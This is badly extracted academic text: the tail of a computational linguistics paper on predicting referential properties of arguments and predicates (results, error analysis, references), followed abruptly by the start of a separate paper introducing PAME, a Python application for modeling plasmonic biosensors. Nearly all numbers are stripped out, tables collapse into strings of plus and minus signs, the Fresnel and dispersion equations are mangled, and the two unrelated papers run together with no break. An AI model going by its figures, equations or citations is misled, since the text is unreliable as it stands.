is.particular is.kind is.abstract all type token glove elmo ρ r ρ r ρ r wr a r g u m e n t + − − − . . . . . . . − + − − . . . . . . . − − + − . . . . . . . − − − + . . . . . . . + + − − . . . . . . . − + − + . . . . . . . + + − + . . . . . . . + + + + . . . . . . . is.particular is.hypothetical is.dynamic p r e d ic a t e + − − − . . . . . . . − + − − . . . . . . . − − + − . . . . . . . − − − + . . . . . . . − − + + . . . . . . . + + − − . . . . . . . − + − + . . . . . . . + − − + . . . . . . . + + + + . . . . . . . table : correlation (ρ) and mae explained (r ) on test split for argument (top) and predicate (bottom) protocols. bolded numbers give the best result in the column; the models highlighted in blue are the ones analyzed in § . argument properties while type-level hand- engineered and learned features perform relatively poorly for properties such as is.particular and is.kind for arguments, they are able to predict is.abstract relatively well compared to the models with all features. the converse of this also holds: token-level hand-engineered features are better able to predict is.particular and is.kind, but perform relatively poorly on their own for is.abstract. this seems likely to be a product of abstract reference being fairly strongly associated with particular lexical items, while most arguments can refer to particulars and kinds (and which they refer to is context-dependent). and in light of the relatively good performance of contextual learned features alone, it suggests that these contextual learned features—in contrast to the hand-engineered token-level features—are able to use this information coming from the lexical item. interestingly, however, the models with both contextual learned features (elmo) and hand- engineered token-level features perform slightly better than those without the hand-engineered features across the board, suggesting that there is some (small) amount of contextual information relevant to generalization that the contextual learned features are missing. this performance boost may be diminished by improved contextual encoders, such as bert (devlin et al., ). predicate properties we see a pattern similar to the one observed for the argument properties mirrored in the predicate properties: whereas type-level hand-engineered and learned features perform relatively poorly for properties such as is.particular and is.hypothetical, they are able to predict is.dynamic relatively well compared with the models with all features. the converse of this also holds: token-level hand-engineered features are better able to predict is.particular and is.hypothetical, but perform relatively poorly on their own for is.dynamic. one caveat here is that, unlike for is.abstract, type-level learned features (glove) alone perform quite poorly for is.dynamic, and the difference between the models with only type-level hand- engineered features and the ones with only token-level hand-engineered features is less stark for is.dynamic than for is.abstract. this may suggest that, though is.dynamic is relatively con- strained by the lexical item, it may be more contextually determined than is.abstract. another downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : true (normalized) property values for argument (top) and predicate (bottom) protocols in the development set plotted against values predicted by models highlighted in blue in table . major difference between the argument prop- erties and the predicate properties is that is.particular is much more difficult to predict than is.hypothetical. this contrasts with is.particular for arguments, which is easier to predict than is.kind. analysis figure plots the true (normalized) property val- ues for the argument (top) and predicate (bottom) protocols from the development set against the values predicted by the models highlighted in blue in table . points are colored by the part-of-speech of the argument or predicate root. we see two overarching patterns. first, our models are generally reluctant to predict values outside the [− , ] range, despite the fact that there are not an insignificant number of true values outside this range. this behavior likely contributes to the difference we saw between the ρ and r metrics, wherein r was generally worse than we would expect from ρ. this pattern is starkest for is.particular in the predicate protocol, where predictions are nearly all constrained to [ , ]. second, the model appears to be heavily reliant on part-of-speech information—or some semantic information related to part-of-speech—for making predictions. this behavior can be seen in the fact that, though common noun-rooted arguments get relatively variable predictions, pronoun- and proper noun-rooted arguments are almost always predicted to be particular, non-kind, non-abstract; and though verb-rooted predicates also get rela- tively variable predictions, common noun-, adjective-, and proper noun-rooted predicates are almost always predicted to be non-dynamic. argument protocol proper nouns tend to refer to particular, non-kind, non-abstract entities, but they can be kind-referring, which our models miss: iphone in ( ) and marines in ( ) were predicted to have low kind score and high particular score, while annotators label these arguments as non-particular and kind-referring. ( ) the us marines took most of fallujah wednesday, but still face[...] ( ) i’m writing an essay...and i need to know if the iphone was the first smart phone. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april this similarly holds for pronouns. as men- tioned in § , we filtered out several pronominal arguments, but certain pronouns—like you, they, yourself, themselves—were not filtered because they can have both particular- and kind-referring uses. our models fail to capture instances where pronouns are labeled kind-referring (e.g., you in ( ) and ( )) consistently predicting low is.kind scores, likely because they are rare in our data. ( ) i like hayes street grill....another plus, it’s right by civic center, so you can take a romantic walk around the opera house, city hall, symphony auditorium[...] ( ) what would happen if you flew the flag of south vietnam in modern day vietnam? this behavior is not seen with common nouns: the model correctly predicts common nouns in certain contexts as non-particular, non-abstract, and kind-referring (e.g., food in ( ) and men in ( )). ( ) kitchen puts out good food[...] ( ) just saying most men suck! predicate protocol as in the argument protocol, general trends associated with part-of-speech are exaggerated by the model. we noted in § that annotators tend to annotate hypothetical predicates as non-particular and vice-versa (ρ= − . ), but the model’s predictions are anti-correlated to a much greater extent (ρ = − . ). for example, annotators are more willing to say a predicate can refer to particular, hypothetical situations ( ) or a non-particular, non-hypothetical situation ( ). ( ) read the entire article[...] ( ) it s illegal to sell stolen property, even if you don’t know its stolen. the model also had a bias towards partic- ular predicates referring to dynamic predicates (ρ = . )—a correlation not present among annotators. for instance, is closed in ( ) was annotated as particular but non-dynamic but predicted by the model to be particular and dy- namic; and helped in ( ) was annotated as non- particular and dynamic, but the model predicted particular and dynamic. ( ) library is closed. ( ) i have a new born daughter and she helped me with a lot. conclusion we have proposed a novel semantic framework for modeling linguistic expressions of generalization as combinations of simple, real-valued referential properties of predicates and their arguments. we used this framework to construct a dataset covering the entirety of the universal depen- dencies english web treebank and probed the ability of both hand-engineered and learned type- and token-level features to predict the annotations in this dataset. acknowledgments we would like to thank three anonymous re- viewers and chris potts for useful comments on this paper as well as scott grimm and the facts.lab at the university of rochester for use- ful comments on the framework and protocol design. this research was supported by the univer- sity of rochester, jhu hltcoe, and darpa aida. the u.s. government is authorized to re- produce and distribute reprints for governmental purposes. the views and conclusions contained in this publication are those of the authors and should not be interpreted as representing official policies or endorsements of darpa or the u.s. government. references lasha abzianidze and johan bos. . towards universal semantic tagging. in iwcs , th international conference on computational semantics, short papers. alan agresti. . categorical data analysis, . john wiley & sons. r.h. baayen. . analyzing linguistic data: a practical introduction to statistics using r. cambridge university press. collin f. baker, charles j. fillmore, and john b. lowe. . the berkeley framenet proj- ect. in proceedings of the th annual meeting of the association for computational linguistics and th international conference on computational linguistics - volume , pages – , montreal. lisa bauer, yicheng wang, and mohit bansal. . commonsense for generative multi- hop question answering tasks. in proceedings downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april of the conference on empirical methods in natural language processing, pages – , brussels. cosmin adrian bejan and sanda harabagiu. . unsupervised event coreference resolution with rich linguistic features. in proceedings of the th annual meeting of the association for computational linguistics, pages – , uppsala. ann bies, justin mott, colin warner, and seth kulick. . english web treebank ldc t . linguistic data consortium, philadelphia, pa. marc brysbaert, amy beth warriner, and victor kuperman. . concreteness ratings for thousand generally known english word lemmas. behavior research methods, ( ): – . greg carlson, rachel sussman, natalie klein, and michael tanenhaus. . weak definite noun phrases. in proceedings of nels , pages – , amherst, ma. greg n. carlson. . reference to kinds in english. ph.d. thesis, university of massachusetts, amherst. gregory carlson. . genericity, in (maienborn et al., ), – . gregory n. carlson and francis jeffry pelletier. . the generic book, the university of chicago press. massimiliano ciaramita and mark johnson. . supersense tagging of unknown nouns in wordnet. in proceedings of the con- ference on empirical methods in natural language processing, pages – . agata cybulska and piek vossen. a. guidelines for ecb+ annotation of events and their coreference. technical report nwr- - , vu university amsterdam. agata cybulska and piek vossen. b. using a sledgehammer to crack a nut? lexical diversity and event coreference resolution. in proceedings of the ninth international con- ference on language resources and evaluation (lrec’ ), reykjavik. marie-catherine de marneffe, timothy dozat, natalia silveira, katri haverinen, filip ginter, joakim nivre, and christopher d. manning. . universal stanford dependencies: a cross-linguistic typology. in proceedings of the ninth international conference on language resources and evaluation (lrec’ ), pages – , reykjavik. jacob devlin, ming-wei chang, kenton lee, and kristina toutanova. . bert: pre-training of deep bidirectional transformers for language understanding. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long and short papers), pages – , minneapolis, mn. george r. doddington, alexis mitchell, mark a. przybocki, lance a. ramshaw, stephanie strassel, and ralph m. weischedel. . the automatic content extraction (ace) program—tasks, data, and evaluation. in pro- ceedings of the fourth international con- ference on language resources and evaluation (lrec’ ), lisbon. bonnie j. dorr. . lcs database. university of maryland. david dowty. . thematic proto-roles and argument selection. language, ( ): – . christiane fellbaum. . wordnet: an electronic lexical database, mit press, cambridge, ma. annemarie friedrich and alexis palmer. a. automatic prediction of aspectual class of verbs in context. in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), pages – , baltimore, md. annemarie friedrich and alexis palmer. b. situation entity annotation. in proceedings of law viii - the th linguistic annotation workshop, pages – , dublin. annemarie friedrich, alexis palmer, melissa peate sørensen, and manfred pinkal. . annotating genericity: a survey, a scheme, and a corpus. in proceedings of the th linguistic annotation workshop, pages – , denver, co. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april annemarie friedrich, alexis palmer, and manfred pinkal. . situation entity types: automatic classification of clause-level aspect. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , berlin. annemarie friedrich and manfred pinkal. a. automatic recognition of habituals: a three- way classification of clausal aspect. in pro- ceedings of the conference on empirical methods in natural language processing, pages – , lisbon. annemarie friedrich and manfred pinkal. b. discourse-sensitive automatic identification of generic expressions. in proceedings of the rd annual meeting of the association for compu- tational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – , beijing. andrew gelman and jennifer hill. . data analysis using regression and multilevel- hierarchical models. cambridge university press, new york city. scott grimm. . individuating the abstract. in proceedings of sinn und bedeutung , pages – , bayonne and vitoria-gasteiz. scott grimm. . crime investigations: the countability profile of a delinquent noun. baltic international yearbook of cognition, logic and communication, . doi: . / - . . scott grimm. . grammatical number and the scale of individuation. language, ( ): – . jerry r. hobbs, william croft, todd davies, douglas edwards, and kenneth laws, . commonsense metaphysics and lexical seman- tics. computational linguistics, ( - ): – . nancy ide, christiane fellbaum, collin baker, and rebecca passonneau. . the manually annotated sub-corpus: a community resource for and by the people. in proceedings of the acl conference short papers, pages – , uppsala. diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. in proceedings of rd international conference on learning representations (iclr ), san diego, ca. heeyoung lee, marta recasens, angel chang, mihai surdeanu, and dan jurafsky. . joint entity and event coreference resolution across documents. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – , jeju island. kenton lee, yoav artzi, yejin choi, and luke zettlemoyer. . event detection and factuality assessment with non-expert supervi- sion. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon. sarah-jane leslie and adam lerner. . generic generalizations, edward n. zalta, editor, the stanford encyclopedia of phil- osophy, winter edition. metaphysics research lab, stanford university. annie louis and ani nenkova. . automatic identification of general and specific sentences by leveraging discourse annotations. in proceed- ings of th international joint conference on natural language processing, pages – , chiang mai. claudia maienborn, klaus von heusinger, and paul portner, editors. . semantics: an international handbook of natural language meaning, volume . mouton de gruyter, berlin. thomas a. mathew. . supervised catego- rization of habitual versus episodic sentences. master’s thesis, georgetown university. john mccarthy. . programs with common sense, rle and mit computation center. john mccarthy. . circumscription—a form of nonmonotonic reasoning. artificial intelli- gence, ( – ): – . john mccarthy. . applications of cir- cumscription to formalizing common sense knowledge. artificial intelligence, : – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april marvin minsky. . a framework for represent- ing knowledge. mit-ai laboratory memo . alexis mitchell, stephanie strassel, mark przybocki, j. k. davis, george doddington, ralph grishman, adam meyers, ada brunstein, lisa ferro, and beth sundheim. . ace- version . ldc t . linguistic data consortium, philadelphia, pa. joakim nivre, zeljko agic, maria jesus aranzabe, masayuki asahara, aitziber atutxa, miguel ballesteros, john bauer, kepa bengoetxea, riyaz ahmad bhat, cristina bosco, sam bowman, giuseppe g. a. celano, miriam connor, marie- catherine de marneffe, arantza diaz de ilarraza, kaja dobrovoljc, timothy dozat, tomaž erjavec, richárd farkas, jennifer foster, daniel galbraith, filip ginter, iakes goenaga, koldo gojenola, yoav goldberg, berta gonzales, bruno guillaume, jan hajič, dag haug, radu ion, elena irimia, anders johannsen, hiroshi kanayama, jenna kanerva, simon krek, veronika laippala, alessandro lenci, nikola ljubešić, teresa lynn, christopher manning, cătălina mărănduc, david mareček, héctor martı́nez alonso, jan mašek, yuji matsumoto, ryan mcdonald, anna missilä, verginica mititelu, yusuke miyao, simonetta montemagni, shunsuke mori, hanna nurmi, petya osenova, lilja Øvrelid, elena pascual, marco passarotti, cenel- augusto perez, slav petrov, jussi piitulainen, barbara plank, martin popel, prokopis prokopidis, sampo pyysalo, loganathan ramasamy, rudolf rosa, shadi saleh, sebastian schuster, wolfgang seeker, mojgan seraji, natalia silveira, maria simi, radu simionescu, katalin simkó, kiril simov, aaron smith, jan štěpánek, alane suhr, zsolt szántó, takaaki tanaka, reut tsarfaty, sumire uematsu, larraitz uria, viktor varga, veronika vincze, zdeněk žabokrtský, daniel zeman, hanzhi zhu. . universal dependencies . . lindat/clarin digital library at the institute of formal and applied linguistics (úfal), faculty of mathematics and physics, charles university. tim o’gorman, kristin wright-bettner, and martha palmer. . richer event description: integrating event coreference with temporal, causal and bridging annotation. in proceedings of the nd workshop on computing news storylines (cns ), pages – , austin, tx. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word representation. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha. matthew peters, mark neumann, mohit iyyer, matt gardner, christopher clark, kenton lee, and luke zettlemoyer. . deep con- textualized word representations. in proceed- ings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long papers), pages – , new orleans, la. massimo poesio. . discourse annotation and semantic annotation in the gnome corpus. in proceedings of the acl workshop on discourse annotation, pages – , barcelona. massimo poesio, yulia grishina, varada kolhatkar, nafise moosavi, ina roesiger, adam roussel, fabian simonjetz, alexandra uma, olga uryupina, juntao yu, and heike zinsmeister. . anaphora resolution with the arrau corpus. in proceedings of the first workshop on computational models of reference, anaphora and coreference, pages – , new orleans, la. james pustejovsky, patrick hanks, roser sauri, andrew see, robert gaizauskas, andrea setzer, dragomir radev, beth sundheim, david day, lisa ferro, and marcia lazo. . the timebank corpus. in proceedings of corpus linguistics, pages – , lancaster. drew reisinger, rachel rudinger, francis ferraro, craig harman, kyle rawlins, and benjamin van durme. . semantic proto- roles. transactions of the association for computational linguistics, : – . nils reiter and anette frank. . identifying generic noun phrases. in proceedings of the th annual meeting of the association for computational linguistics, pages – , uppsala. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april raymond reiter. . nonmonotonic reasoning, in j. f. traub, n. j. nilsson, and b. j. grosz, editors, annual review of computer science, volume , pages – . annual reviews inc. rachel rudinger, aaron steven white, and benjamin van durme. . neural models of factuality. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long papers), pages – , new orleans, la. roger c. schank and robert p. abelson. . scripts, plans, and knowledge. in proceedings of the th international joint conference on artificial intelligence - volume , pages – . karin kipper schuler. . verbnet: a broad- coverage, comprehensive verb lexicon. ph.d. thesis, computer and information science department, universiy of pennsylvania. natalia silveira, timothy dozat, marie-catherine de marneffe, samuel bowman, miriam connor, john bauer, and chris manning. . a gold standard dependency corpus for english. in proceedings of the ninth international conference on language resources and eval- uation (lrec’ ). gabriel stanovsky, judith eckle-kohler, yevgeniy puzikov, ido dagan, and iryna gurevych. . integrating deep linguistic fea- tures in factuality prediction over unified data- sets. in proceedings of the th annual meeting of the association for computational linguis- tics (volume : short papers), pages – , vancouver. siddharth vashishtha, benjamin van durme, and aaron steven white. . fine-grained temporal relation extraction. arxiv, cs.cl/ . v . zeno vendler. . verbs and times. philo- sophical review, ( ): – . christopher walker, stephanie strassel, julie medero, and kazuaki maeda. . ace multilingual training corpus ldc t . linguistic data consortium, philadelphia, pa. aaron steven white, kyle rawlins, and benjamin van durme. . the semantic proto-role linking model. in proceedings of the th conference of the european chapter of the association for computational linguistics, volume , pages – , valencia. aaron steven white, drew reisinger, keisuke sakaguchi, tim vieira, sheng zhang, rachel rudinger, kyle rawlins, and benjamin van durme. . universal decompositional semantics on universal dependencies. in pro- ceedings of the conference on empirical methods in natural language processing, pages – , austin, tx. sheng zhang, rachel rudinger, kevin duh, and benjamin van durme. a. ordinal common-sense inference. transactions of the association for computational linguistics, : – . sheng zhang, rachel rudinger, and benjamin van durme. b. an evaluation of predpatt and open ie via stage semantic role labeling. in iwcs , th international conference on computational semantics, short papers, montpellier. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april introduction background annotation framework framework validation comparison to standard ontology bulk annotation exploratory analysis models results analysis conclusion pame: plasmonic assay modeling environment submitted may accepted july published august corresponding author adam hughes, hugadams@gwmail.gwu.edu academic editor feng gu additional information and declarations can be found on page doi . /peerj-cs. copyright hughes et al. distributed under creative commons cc-by . open access pame: plasmonic assay modeling environment adam hughes, zhaowen liu and mark e. reeves the george washington university, washington, d.c., usa abstract plasmonic assays are an important class of optical sensors that measure biomolecular interactions in real-time without the need for labeling agents, making them especially well-suited for clinical applications. through the incorporation of nanoparticles and fiberoptics, these sensing systems have been successfully miniaturized and show great promise for in-situ probing and implantable devices, yet it remains challenging to derive meaningful, quantitative information from plasmonic responses. this is in part due to a lack of dedicated modeling tools, and therefore we introduce pame, an open-source python application for modeling plasmonic systems of bulk and nanoparticle-embedded metallic films. pame combines aspects of thin-film solvers, nanomaterials and fiber-optics into an intuitive graphical interface. some of pame’s features include a simulation mode, a database of hundreds of materials, and an object-oriented framework for designing complex nanomaterials, such as a gold nanoparticles encased in a protein shell. an overview of pame’s theory and design is presented, followed by example simulations of a fiberoptic refractometer, as well as protein binding to a multiplexed sensor composed of a mixed layer of gold and silver colloids. these results provide new insights into observed responses in reflectance biosensors. subjects computational biology, scientific computing and simulation, software engineering keywords assays, bioengineering, python, modeling, biosensing, simulation, software, plasmonics, nanoparticles, fiberoptics, thin films introduction plasmonic sensors refer to a class of label-free detection platforms that utilize the optical properties of metals as a transduction mechanism to measure physical, chemical and biomolecular processes. these sensors have been utilized in immunology research (pei et al., ; tang, dong & ren, ), drug discovery (chen, obinata & izumi, ; kraziński, radecki & radecka, ), dna mutations (litos et al., ), and in many other novel applications. the conventional configuration of a plasmonic sensor is a thin layer of metal, most commonly gold or silver, deposited on a glass chip and illuminated from below at oblique incidence. this induces plasmon excitations along the surface of the film. this design has been successfully commercialized by biacoretm, and has been extended to include multilayer and mixed-alloy films (sharma & gupta, ; sharma & gupta, ), and films deposited on optical fibers. over the same time period, gold and silver nanoparticles (aunps, agnps) gained attention for their potential in drug delivery (jong, ; wilczewska et al., ), and their intrinsic sensing properties, as how to cite this article hughes et al. ( ), pame: plasmonic assay modeling environment. peerj comput. sci. :e ; doi . /peerj-cs. mailto:hugadams@gwmail.gwu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. each individual nanoparticle acts as a nanoscale transducer. surface plasmons localized to roughly a nm region around the colloid (malinsky et al., ) are excited by light of any angle of incidence, and exhibit strong electromagnetic hotspots (barrow et al., ; cheng et al., ) with greater sensitivity to their local environment than bulk films. this is especially true for non-spherical nanoparticles like nanorods and nanostars (yin et al., ; nikoobakht & el-sayed, ; kessentini & barchiesi, ), and leads to great field-enhancements for raman spectroscopy (freeman et al., ; sau et al., ). while free solutions of colloids alone can serve as sensors (jans et al., ; tang, dong & ren, ), they are easily destabilized by surface agents, and alterations in salinity and ph of their surrounding environment, resulting in particle aggregation (pease et al., ; zakaria et al., ). nanoparticle monolayers engineered through vapor deposition (singh & whitten, ), lithography (haes et al., ), or self-assembly onto organosilane linkers (nath & chilkoti, ; brown & doorn, ; fujiwara, kasaya & ogawa, ) now commonly replace their bulk film counterparts, since they retain the enhanced sensitivity and flexible surface chemistry of the colloids, while being less prone chemically-deposited nanoparticles are slightly mobile in the film, and still tend to form dimers, trimers and higher order clusters under certain conditions (scarpettini & bragas, ; hughes et al., ). to aggregation. label-free measurements are indirect and prone to false-positives, as it can be difficult to distinguish specific binding events from non-specific binding, adsorption onto the sensor surface, and changes in the environment due to heating, convection and other processes. to mitigate these effects, plasmonic sensors undergo an extensive standardization process. first, they are calibrated to yield a linear response to bulk refractive index changes. next, the sensor surface is modified to be neutral, hydrophillic and sparsely covered with for planar gold chips, dextran provides an optimal coating; however, for nanoparticles, short-chain alkanethiols and polyethylene glycols are preferred due to their smaller size (malinsky et al., ; mayer et al., ). covalently deposited ligands. to measure ligand-analyte association and dissociation constants, ka,kd, solutions of varying concentration of analyte are washed over the surface, and the response is measured and interpreted within a protein interaction model (pollard, ; chang et al., ). each of these steps impose challenges for plasmonic sensors utilizing nanoparticle-embedded films. primarily, the sensor response becomes highly sensitive to the film topology (quinten, ; lans, ), which is difficult to interpret and optimize without modeling tools. furthermore, measurements of ka and kd require varying analyte concentrations under identical surface conditions. commercial systems often employ multichannel-sampling on a single surface (attana, ), or multiplex multiple surfaces in a single run (fortebio, ), while researchers mostly rely on the presumption of identical sensor surface topology, chemistry and experimental conditions. without a quantitative model for sensor response to protein binding, it is impossible to estimate how many molecules are adsorbed on the sensor. this information is critical to validating binding models; for example, whether a measured response is too large to be described by a : monomeric reaction. is the amount of deposited ligand likely to lead to avidity effects? in non-equilibrium applications such as monitoring the hormone levels of cells, the analyte concentration is unknown and only a single excretion event may occur; in such cases, the ability to translate optical responses directly into quantitative estimations of ligand and receptor through modeling is paramount. hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. researchers modeling plasmonic systems may opt to use monolithic design tools like comsoltm multiphysics and lumericaltm solutions. while such tools offer comprehensive photonic design environments, they are quite general in design and carry more overhead than is needed to model the basic fiber and chip geometries described in this paper. on the other hand, related open-source tools are too disjoint to be effectively integrated into a single workflow. for example, thin-film solvers are widely available (for a comprehensive list, see optenso, ), and the mnpbem toolbox (hohenester & trugler, ) offers a matlabtm interface for nanomaterial design. yet, to design materials in mnpbem and integrate them into film solvers requires a customized pipeline. furthermore, simple geometric fill models for nanoparticle-protein binding are not available in these tools, even though these fill models have been successful (klebstov, ; lopatynskyi et al., ; tsai et al., ) in describing aunp-protein binding in free solution. with an abundance of parameters, ranging from the nanoscale to the macroscopic, characterizing a biosensor can quickly become intractable and a specialized solution is needed. herein, the plasmonic assay modeling environment (pame) is introduced as an open-source python application for modeling plasmonic biosensors. pame is a fully graphical application that integrates aspects of material science (material modeling, effective medium theories, nanomaterials), thin-film design, fiberoptics, ellipsometry and spectroscopy, with the goal of providing a simple framework for designing, simulating and characterizing plasmonic biosensors. pame helps to illuminate non-obvious relationships between sensor parameters and response. after an overview of its theory and design, several examples are presented. first, pame is used to model the refractometric response of an aunp-coated optical fiber to increasing concentrations of glycerin. it is shown that the response peaks at λmax ≈ nm , a result supported by experiment, even though the nanoparticles absorb most strongly at λmax ≈ nm. next, pame simulates protein binding events onto a mixed layer of gold and silver nanoparticles in a multiplexed fiber setup. finally, a brief overview of pame’s requirements, performance and future development is presented. additional examples in the form of ipython notebooks (perez & granger, ), as well as video tutorials, are available in the supplemental information. theory and design many plasmonic sensors can be modeled as a multilayer stack of homogeneous materials, also referred to as films or dielectric slabs, arranged on a substrate so as to transduce interactions between light and the stack. the substrate represents a light guide such as a chip or an optical fiber. the transduced signal is some optical property of the multilayer, commonly transmittance or spectral reflectance, or in the case of ellipsometry, changes in the reflected light’s polarization state (moirangthem, chang & wei, ). much of the diversity in plasmonic sensors is therefore due to design parameters rather than dissimilar physics, and has been described thoroughly by bd gupta (sharma & gupta, ; sharma & gupta, ; gupta & verma, ; singh, verma & gupta, ; mishra, mishra & gupta, ). pame was designed specifically to model these types of systems. hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure pame’s user interface. (a) panel to view material quantities such as index of refraction, n(λ), and nanoparticle extinction cross section, σext(λ). currently shown is e(λ) for a layer of gold nanoparticles in water at a fill fraction of about % using garcia’s mixing model. (b) panel of plotted optical properties such as transmittance, t(λ), and reflectance, Γ(λ). here the reflectance coefficient for p-polarized light rp(λ) is shown. the spread in the linewidth corresponds to variations in light modes over the range > θ ≥ ◦. (c) five primary panels and tabular interface (d) for constructing the dielectric stack: silica (substrate) | organosilanes ( nm) | aunps in h o ( nm) |h o (solvent) for ≤ λ ≤ nm. pame is designed with four integrated subprograms: a materials adapter to model bulk, composite, and nanomaterials; a multilayer thinfilm calculator; a substrate design interface; and a simulation and data analysis framework. figure shows a screenshot of the pame’s main window, with its five primary panels: main, substrate, stack, material and simulations. main refers to global settings, for example the operating wavelength range. the remaining tabs correspond directly to the four aforementioned subprograms. together, they provide a complete framework for modeling a plasmonic sensor, and lend a useful narrative that will be followed in the ordering of the remaining sections of this paper. incidentally, the progression from substrate, stack and material represents a top-down view of the model, starting from macroscopic parameters and working down to the microscopic. substrate types pame supports two substrates: optical fibers and chips. substrates mediate the interaction between light and the multilayer stack through a weighting function, n i f (θi), where θi corresponds to the angle of the ith incident light ray onto the substrate. the chip is meant to describe simple configurations, for example a gold film deposited on a glass slide and illuminated from below at a single angle, θo. in this case, n i f (θi) = δ(θo). for optical fibers, the propagation modes are determined by properties of the fiber itself, such as its numerical aperture, core and cladding materials, and its ability to maintain polarization states. furthermore, the placement of the multilayer on different regions of the fiber has a hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure light propagation in fiber optic biosensor. (a) a light ray propagating in an optical fiber core. transverse refers to a multilayer deposited along the propagation direction, while axial is perpendicular and deposited on the fiber endface. the fiber cladding and jacket are hidden for clarity. (b) the θ = plane wave incident on the stack. (c) illustration of the homogenized multilayers, and some of the electromagnetic quantities associated with each interface, reproduced with permission from (orfanidis, ). significant effect on f (θi), and hence on the optical response of the sensor. the two most common orientations, either transversally along the propagation direction on the fiber, see mishra, mishra & gupta ( ) eq. ( ) for an example of f (θ ) for a transversal fiber with collimated light source. or axially on the cleaved fiber endface, are shown in fig. . both of these orientations have been realized as biosensors (lipoprotein et al., ; shrivastav, mishra & gupta, ), with the axial configuration, often referred to as a “dip sensor” because the endface is dipped into the sample, appearing more often in recent years (mitsui, handa & kajikawa, ; wan et al., ; jeong et al., ; sciacca & monro, ). pame does not presently support multilayers along bent regions of the fiber, or along sharpened optical tips (issa & guckenberger, ; library et al., ) and assumes all rays to be plane waves. for advanced waveguide design and modal analysis, we recommend lumericaltm mode solutions. pame’s substrate interface queries users to configure chip and optical fiber parameters, rather than working directly with f (θi). users can choose between multilayer orientation, polarization state (p, s or unpolarized), and range of angles, all from which pame builds f (θ ). the interface is user-friendly, and attempts to obviate incompatible or unphysical settings. for instance, the ellipsometric amplitude (Ψ) and phase (δ) depend on ratios of p-polarized to s-polarized light reflectance, but users may opt to only compute s-waves, resulting in errant calculations downstream. anticipating this, pame provides an ellipsometry mode, which when enabled, prevents the polarization state from being changed. by combining substrate types with context modes, pame provides a simple interface for modeling a number of common optical setups. multilayer stack figure depicts the multilayer stack, in which each dielectric slab is assumed to be homogenous, and of uniform thickness; heterogeneous materials must be homogenized through an effective medium theory (emt). furthermore, the multilayer model presumes that layers are connected by smooth and abrupt boundaries to satisfy fresnel’s equations. the first and last layers, conventionally referred to as “substrate” and “solvent,” are assumed to be semi-infinite, with incident light originating in the substrate. the treatment hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. of anisotropic layers without effective medium approximations is discussed in the future improvement section. a light ray incident on the stack at angle θ , as set by f (θ ), will reflect, refract and absorb, in accordance with fresnel’s equations. for example, in a simple -layer system, the light reflectance, Γ(λ), at the boundary between n ,n is r = (rs + rp) ( ) r = n cosθi − n cosθtn cosθi + n cosθt  + n cosθt − n cosθin cosθt + n cosθi   , ( ) where θi,θt are the angles of incidence upon, and transmission into n from n , and rs and rp are the complex reflection coefficients of the s and p-polarized light. for n -layers, fresnel’s equations are solved recursively using the transfer matrix method(tmm), also referred to as the recursive rouard method (rouard, ; lecaruyer et al., ). in addition to the reflectance, transmittance and absorbance, a variety of optical quantities are computed in the multilayer, including the poynting vector, the complex wave vector angle, ellipsometric parameters, and film color. for a thorough treatment of light propagation in multilayer structures, see orfanidis ( ) and steed ( ). pame offers a simple tabular interface for adding, removing, and editing materials in arbitrarily many layers, as shown in fig. c. pame delegates the actual tmm calculation to an adapted version of the python package, tmm (byrnes, ). pame material classes pame includes three material categories: bulk materials, composite materials and nanomaterials. a bulk material such as a gold film is sufficiently characterized by its index of refraction. the optical properties of a gold nanoparticle, however, depend on the index of gold, particle size, the surrounding medium, a particle-medium mixing model, and other parameters. a nanoparticle with a shell is even more intricate. pame encapsulates a rich hierarchy of materials in an object-oriented framework to ensure compatibility with the multilayer stack and interactive plotting interface. bulk material in pame, a “bulk” material refers to a single, homogeneous substance, fully characterized by its complex index of refraction, ñ = n + iκ, or dielectric function, ẽ = e + iϵ, which are related through a complex root (ẽ = √ ñ), which gives the relations e = n − κ n =  √ e + ϵ + e ϵ = nκ κ =  √ e + ϵ − e . here n and e, and optical quantities derived from them, are understood to be dispersive functions of wavelengths, n(λ),e(λ). the refractive index n is assumed to be independent hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. of temperature and non-magnetic at optical frequencies . the index of refraction of ferromagnetic nanoparticles do exist, and are have already been utilized in sensing applications (pellegrini & mattei, ). bulk materials is obtained through experimental measurements, modeling, or through a combination of the two; for example, measuring n at several wavelengths, and fitting to a dispersion model such as the sellmeier equation, n(λ) =  + a λ λ − b + a λ λ − b + a λ λ − b + ···. ( ) pame is bundled with several 